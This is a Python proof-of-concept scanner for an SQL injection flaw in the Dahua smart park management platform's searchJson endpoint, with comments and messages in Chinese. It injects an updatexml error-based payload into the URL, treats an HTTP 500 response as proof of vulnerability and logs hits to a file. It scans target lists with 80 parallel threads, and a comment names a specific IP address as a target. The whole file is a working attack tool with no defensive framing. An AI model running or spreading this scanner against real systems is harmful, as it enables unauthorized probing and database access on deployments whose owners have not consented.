import requests,argparse 
from multiprocessing.dummy import Pool  
requests.packages.urllib3.disable_warnings()  # 解除警告  url为http://183.67.37.242:8009
  
GREEN = '\033[92m'  
RESET = '\033[0m'    
def banner():  
    text = '''  
.----------------.  .----------------.  .----------------.  .----------------.  .----------------.   
| .--------------. || .--------------. || .--------------. || .--------------. || .--------------. |  
| |  ________    | || |      __      | || |  ____  ____  | || | _____  _____ | || |      __      | |  
| | |_   ___ `.  | || |     /  \     | || | |_   ||   _| | || ||_   _||_   _|| || |     /  \     | |  
| |   | |   `. \ | || |    / /\ \    | || |   | |__| |   | || |  | |    | |  | || |    / /\ \    | |  
| |   | |    | | | || |   / ____ \   | || |   |  __  |   | || |  | '    ' |  | || |   / ____ \   | |  
| |  _| |___.' / | || | _/ /    \ \_ | || |  _| |  | |_  | || |   \ `--' /   | || | _/ /    \ \_ | |  
| | |________.'  | || ||____|  |____|| || | |____||____| | || |    `.__.'    | || ||____|  |____|| |  
| |              | || |              | || |              | || |              | || |              | |  
| '--------------' || '--------------' || '--------------' || '--------------' || '--------------' |  
 '----------------'  '----------------'  '----------------'  '----------------'  '----------------'   
'''  
    print(text)  
  
def poc(target):  
    url = target + '/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20@@version),0x7e),1)--%22%7D/extend/%7B%7D'  
    headers = {  
        'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; SE 2.X MetaSr 1.0)',  
        'Accept-Encoding': 'gzip, deflate, br',  
        'Connection': 'close'  
    }  
    try:  
        res = requests.get(url=url, headers=headers, timeout=10,verify=False)  
        if res.status_code == 500:  
            print(f'{GREEN}[+]sql注入检测:该网站存在sql注入,url为{target}{RESET}')  
            with open('result.txt', 'a') as f:  
                f.write(target + '\n')  
        else:  
            print(f'[-]不存在sql注入:url为{target}')  
    except Exception as e:  
        print(f'[*]{target} 出错: {e}')  
  
def main():  
    parser = argparse.ArgumentParser(description="大华智慧园区综合管理平台 searchJson SQL注入漏洞")  
    parser.add_argument('-u', '--url', dest='url', type=str, help="输入单个URL")  
    parser.add_argument('-f', '--file', dest='file', type=str, help="输入包含URL的文件路径")  
    args = parser.parse_args()  
  
    if args.url and not args.file:  # 处理单个URL  
        poc(args.url)  
    elif args.file and not args.url:
        url_list =[]
        with open(args.file,'r',encoding='utf-8') as fp:
            for i in fp.readlines():
                url_list.append(i.strip().replace('\n',''))
        mp =Pool(80)
        mp.map(poc,url_list)
        mp.close()
        mp.join() 

if __name__ == '__main__':
    main()
